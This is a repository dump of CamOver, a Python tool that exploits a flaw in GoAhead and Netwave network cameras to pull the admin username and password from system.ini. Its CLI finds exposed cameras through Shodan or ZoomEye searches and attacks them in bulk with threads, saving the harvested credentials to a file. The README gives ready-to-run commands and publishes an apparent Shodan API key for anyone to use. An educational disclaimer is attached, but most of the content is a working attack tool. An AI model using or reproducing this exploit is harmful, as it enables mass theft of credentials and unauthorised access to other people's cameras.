Repository: EntySec/CamOver Branch: main Commit: 483befd1d0d2 Files: 10 Total size: 25.6 KB Directory structure: gitextract_7gd6z7nj/ ├── .gitignore ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── TERMS_OF_SERVICE.md ├── camover/ │ ├── __init__.py │ ├── __main__.py │ └── cli.py └── setup.py ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ # Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class # C extensions *.so # Distribution / packaging .Python build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ lib/ lib64/ parts/ sdist/ var/ wheels/ pip-wheel-metadata/ share/python-wheels/ *.egg-info/ .installed.cfg *.egg MANIFEST # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. *.manifest *.spec # Installer logs pip-log.txt pip-delete-this-directory.txt # Unit test / coverage reports htmlcov/ .tox/ .nox/ .coverage .coverage.* .cache nosetests.xml coverage.xml *.cover *.py,cover .hypothesis/ .pytest_cache/ # Translations *.mo *.pot # Django stuff: *.log local_settings.py db.sqlite3 db.sqlite3-journal # Flask stuff: instance/ .webassets-cache # Scrapy stuff: .scrapy # Sphinx documentation docs/_build/ # PyBuilder target/ # Jupyter Notebook .ipynb_checkpoints # IPython profile_default/ ipython_config.py # pyenv .python-version # pipenv # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. # However, in case of collaboration, if having platform-specific dependencies or dependencies # having no cross-platform support, pipenv may install dependencies that don't work, or not # install all needed dependencies. #Pipfile.lock # PEP 582; used by e.g. github.com/David-OConnor/pyflow __pypackages__/ # Celery stuff celerybeat-schedule celerybeat.pid # SageMath parsed files *.sage.py # Environments .env .venv env/ venv/ ENV/ env.bak/ venv.bak/ # Spyder project settings .spyderproject .spyproject # Rope project settings .ropeproject # mkdocs documentation /site # mypy .mypy_cache/ .dmypy.json dmypy.json # Pyre type checker .pyre/ ================================================ FILE: CODE_OF_CONDUCT.md ================================================ # Contributor Covenant Code of Conduct ## Our Pledge We as members, contributors, and leaders pledge to make participation in our community a harassment-free experience for everyone, regardless of age, body size, visible or invisible disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation. We pledge to act and interact in ways that contribute to an open, welcoming, diverse, inclusive, and healthy community. ## Our Standards Examples of behavior that contributes to a positive environment for our community include: * Demonstrating empathy and kindness toward other people * Being respectful of differing opinions, viewpoints, and experiences * Giving and gracefully accepting constructive feedback * Accepting responsibility and apologizing to those affected by our mistakes, and learning from the experience * Focusing on what is best not just for us as individuals, but for the overall community Examples of unacceptable behavior include: * The use of sexualized language or imagery, and sexual attention or advances of any kind * Trolling, insulting or derogatory comments, and personal or political attacks * Public or private harassment * Publishing others' private information, such as a physical or email address, without their explicit permission * Other conduct which could reasonably be considered inappropriate in a professional setting ## Enforcement Responsibilities Community leaders are responsible for clarifying and enforcing our standards of acceptable behavior and will take appropriate and fair corrective action in response to any behavior that they deem inappropriate, threatening, offensive, or harmful. Community leaders have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, and will communicate reasons for moderation decisions when appropriate. ## Scope This Code of Conduct applies within all community spaces, and also applies when an individual is officially representing the community in public spaces. Examples of representing our community include using an official e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. ## Enforcement Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at entysec@gmail.com. All complaints will be reviewed and investigated promptly and fairly. All community leaders are obligated to respect the privacy and security of the reporter of any incident. ## Enforcement Guidelines Community leaders will follow these Community Impact Guidelines in determining the consequences for any action they deem in violation of this Code of Conduct: ### 1. Correction **Community Impact**: Use of inappropriate language or other behavior deemed unprofessional or unwelcome in the community. **Consequence**: A private, written warning from community leaders, providing clarity around the nature of the violation and an explanation of why the behavior was inappropriate. A public apology may be requested. ### 2. Warning **Community Impact**: A violation through a single incident or series of actions. **Consequence**: A warning with consequences for continued behavior. No interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, for a specified period of time. This includes avoiding interactions in community spaces as well as external channels like social media. Violating these terms may lead to a temporary or permanent ban. ### 3. Temporary Ban **Community Impact**: A serious violation of community standards, including sustained inappropriate behavior. **Consequence**: A temporary ban from any sort of interaction or public communication with the community for a specified period of time. No public or private interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, is allowed during this period. Violating these terms may lead to a permanent ban. ### 4. Permanent Ban **Community Impact**: Demonstrating a pattern of violation of community standards, including sustained inappropriate behavior, harassment of an individual, or aggression toward or disparagement of classes of individuals. **Consequence**: A permanent ban from any sort of public interaction within the community. ## Attribution This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 2.0, available at https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. Community Impact Guidelines were inspired by [Mozilla's code of conduct enforcement ladder](https://github.com/mozilla/diversity). [homepage]: https://www.contributor-covenant.org For answers to common questions about this code of conduct, see the FAQ at https://www.contributor-covenant.org/faq. Translations are available at https://www.contributor-covenant.org/translations. ================================================ FILE: CONTRIBUTING.md ================================================ ## Contributing [fork]: /fork [pr]: /compare [code-of-conduct]: CODE_OF_CONDUCT.md [templates]: templates Hi there! We're thrilled that you'd like to contribute to this project. Your help is essential for keeping it great. Please note that this project is released with a [Contributor Code of Conduct][code-of-conduct]. By participating in this project you agree to abide by its terms. ## Issues and PRs If you have suggestions for how this project could be improved, or want to report a bug, open an issue! We'd love all and any contributions. If you have questions, too, we'd love to hear them. We'd also love PRs. If you're thinking of a large PR, we advise opening up an issue first to talk about it, though! Look at the links below if you're not sure how to open a PR. ## Submitting a pull request 1. [Fork][fork] and clone the repository. 2. Create a new branch: `git checkout -b my-branch-name`. 3. Make your changes, fix bugs, add modules, plugins or commands and perform tests. 4. Push to your fork and [submit a pull request][pr]. 5. Pat your self on the back and wait for your pull request to be reviewed and merged. Here are a few things you can do that will increase the likelihood of your pull request being accepted: - Follow the standard of [templates][templates]. - Keep your changes as focused as possible. If there are multiple changes you would like to make that are not dependent upon each other, consider submitting them as separate pull requests. - Write a [good commit message](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html). Work in Progress pull requests are also welcome to get feedback early on, or if there is something blocked you. ## Resources - [How to Contribute to Open Source](https://opensource.guide/how-to-contribute/) - [Using Pull Requests](https://help.github.com/articles/about-pull-requests/) - [GitHub Help](https://help.github.com) ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2020-2024 EntySec Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: README.md ================================================ # CamOver [![Developer](https://img.shields.io/badge/developer-EntySec-blue.svg)](https://entysec.com) [![Language](https://img.shields.io/badge/language-Python-blue.svg)](https://github.com/EntySec/CamOver) [![Forks](https://img.shields.io/github/forks/EntySec/CamOver?style=flat&color=green)](https://github.com/EntySec/CamOver/forks) [![Stars](https://img.shields.io/github/stars/EntySec/CamOver?style=flat&color=yellow)](https://github.com/EntySec/CamOver/stargazers) [![CodeFactor](https://www.codefactor.io/repository/github/EntySec/CamOver/badge)](https://www.codefactor.io/repository/github/EntySec/CamOver) CamOver is a camera exploitation tool that allows to disclosure network camera admin password. ## Features * Exploits vulnerabilities in most popular camera models such as `CCTV`, `GoAhead` and `Netwave`. * Optimized to exploit multiple cameras at one time from list with threading enabled. * Simple CLI and API usage. ## Installation ```shell pip3 install git+https://github.com/EntySec/CamOver ``` ## Basic usage To use CamOver just type `camover` in your terminal. ``` usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES] CamOver is a camera exploitation tool that allows to disclosure network camera admin password. optional arguments: -h, --help show this help message and exit -t, --threads Use threads for fastest work. -o OUTPUT, --output OUTPUT Output result to file. -i INPUT, --input INPUT Input file of addresses. -a ADDRESS, --address ADDRESS Single address. --shodan SHODAN Shodan API key for exploiting devices over Internet. --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet. -p PAGES, --pages PAGES Number of pages you want to get from ZoomEye. ``` ### Examples **Exploiting single camera** Let's hack my camera just for fun. ```shell camover -a 192.168.99.100 ``` **Exploiting cameras from Internet** Let's try to use Shodan search engine to exploit cameras over Internet, we will use it with `-t` for fast exploitation. ```shell camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD ``` **NOTE:** Given Shodan API key (`PSKINdQe1GyxGgecYz2191H2JoS9qvgD`) is my PRO API key, you can use this key or your own, be free to use all our resources for free :) **Exploiting cameras from input file** Let's try to use opened database of cameras with `-t` for fast exploitation. ```shell camover -t -i cameras.txt -o passwords.txt ``` **NOTE:** It will exploit all cameras in `cameras.txt` list by their addresses and save all obtained passwords to `passwords.txt`. ## API usage CamOver also has their own Python API that can be invoked by importing CamOver to your code. ```python from camover import CamOver ``` ### Basic functions There are all CamOver basic functions that can be used to exploit specified camera. * `exploit(address)` - Exploit single camera by given address. ### Examples **Exploiting single camera** ```python from camover import CamOver camover = CamOver() creds = camover.exploit('192.168.99.100') print(creds) ``` ================================================ FILE: TERMS_OF_SERVICE.md ================================================ # Terms of Service ## Our disclaimer This tool is designed for educational purposes only. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this tool against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license. After installing this tool, you automatically accept our terms of service and agree that you will use it only for lawful purposes. ================================================ FILE: camover/__init__.py ================================================ """ MIT License Copyright (c) 2020-2024 EntySec Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from .__main__ import CamOver ================================================ FILE: camover/__main__.py ================================================ """ MIT License Copyright (c) 2020-2024 EntySec Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import re import requests class CamOver(object): """ Main class of camover module. This main class of camover module is intended for providing an exploit for network camera vulnerability that extracts credentials from the obtained system.ini file. """ @staticmethod def exploit(address: str) -> tuple: """ Exploit the vulnerability in network camera and extract credentials :param str address: device address :return tuple: tuple of username and password """ username = 'admin' try: response = requests.get( f"http://{address}/system.ini?loginuse&loginpas", verify=False, timeout=3 ) except Exception: return if response.status_code == 200: strings = re.findall("[^\x00-\x1F\x7F-\xFF]{4,}", response.text) if username in strings: username_index = strings.index(username) password = strings[username_index + 1] return username, password ================================================ FILE: camover/cli.py ================================================ """ MIT License Copyright (c) 2020-2024 EntySec Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import os import argparse import requests import threading from badges import Badges from shodan import Shodan from time import sleep as thread_delay from .__main__ import CamOver class CamOverCLI(CamOver, Badges): """ Subclass of camover module. This subclass of camover module is intended for providing command-line interface for CamOver. """ thread_delay = 0.1 description = ( 'CamOver is a camera exploitation tool that allows to' ' disclosure network camera admin password.' ) parser = argparse.ArgumentParser(description=description) parser.add_argument('-t', '--threads', dest='threads', action='store_true', help='Use threads for fastest work.') parser.add_argument('-o', '--output', dest='output', help='Output result to file.') parser.add_argument('-i', '--input', dest='input', help='Input file of addresses.') parser.add_argument('-a', '--address', dest='address', help='Single address.') parser.add_argument('--shodan', dest='shodan', help='Shodan API key for exploiting devices over Internet.') parser.add_argument('--zoomeye', dest='zoomeye', help='ZoomEye API key for exploiting devices over Internet.') parser.add_argument('-p', '--pages', dest='pages', type=int, help='Number of pages you want to get from ZoomEye.') args = parser.parse_args() def thread(self, address: str) -> bool: """ Start new thread for the specified address. :param str address: device address :return bool: True if thread succeed """ result = self.exploit(address) if result: result = f"({address}) - {result[0]}:{result[1]}" if not self.args.output: self.print_success(result) else: with open(self.args.output, 'a') as f: f.write(f"{result}\n") return True return False def crack(self, addresses: list) -> None: """ Crack all devices from the specified list. :param list addresses: list of devices addresses :return None: None """ line = "/-\\|" counter = 0 threads = list() for address in addresses: if counter >= len(line): counter = 0 self.print_process(f"Exploiting... ({address}) {line[counter]}", end='') if not self.args.threads: self.thread(address) else: thread_delay(self.thread_delay) thread = threading.Thread(target=self.thread, args=[address]) thread.start() threads.append(thread) counter += 1 counter = 0 for thread in threads: if counter >= len(line): counter = 0 self.print_process(f"Cleaning up... {line[counter]}", end='') if thread.is_alive(): thread.join() counter += 1 def start(self) -> None: """ Main command-line arguments handler. :return None: None """ if self.args.output: directory = os.path.split(self.args.output)[0] if directory: if not os.path.isdir(directory): self.print_error(f"Directory: {directory}: does not exist!") return if self.args.zoomeye: self.print_process("Authorizing ZoomEye by given API key...") try: zoomeye = 'https://api.zoomeye.org/host/search?query=GoAhead 5ccc069c403ebaf9f0171e9517f40e41&page=' zoomeye_header = { 'Authorization': f'JWT {self.zoomeye}' } addresses = list() if self.args.pages: pages = int(self.args.pages) else: pages = 100 pages, page = divmod(pages, 20) if page != 0: pages += 1 for page in range(1, pages + 1): results = requests.get(zoomeye + str(page), headers=zoomeye_header).json() if not len(results['matches']): self.print_error("Failed to authorize ZoomEye!") return for address in results['matches']: addresses.append(address['ip'] + ':' + str(address['portinfo']['port'])) except Exception: self.print_error("Failed to authorize ZoomEye!") return self.crack(addresses) elif self.args.shodan: self.print_process("Authorizing Shodan by given API key...") try: shodan = Shodan(self.args.shodan) results = shodan.search(query='GoAhead 5ccc069c403ebaf9f0171e9517f40e41') addresses = list() for result in results['matches']: addresses.append(result['ip_str'] + ':' + str(result['port'])) except Exception: self.print_error("Failed to authorize Shodan!") return self.print_success("Authorization successfully completed!") self.crack(addresses) elif self.args.input: if not os.path.exists(self.args.input): self.print_error(f"Input file: {self.args.input}: does not exist!") return with open(self.args.input, 'r') as f: addresses = f.read().strip().split('\n') self.crack(addresses) elif self.args.address: self.print_process(f"Exploiting {self.args.address}...") if not self.thread(self.args.address): self.print_error(f"({self.args.address}) - is not vulnerable!") else: self.parser.print_help() return self.print_empty(end='') def main() -> None: """ CamOver command-line interface. :return None: None """ try: cli = CamOverCLI() cli.start() except BaseException: pass ================================================ FILE: setup.py ================================================ """ MIT License Copyright (c) 2020-2024 EntySec Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from setuptools import setup, find_packages setup(name='camover', version='1.0.0', description=( 'CamOver is a camera exploitation tool that allows to' ' disclosure network camera admin password.' ), url='https://github.com/EntySec/CamOver', author='EntySec', author_email='entysec@gmail.com', license='MIT', python_requires='>=3.7.0', packages=find_packages(), entry_points={ "console_scripts": [ "camover = camover.cli:main" ] }, install_requires=[ 'shodan', 'badges @ git+https://github.com/EntySec/Badges' ], zip_safe=False )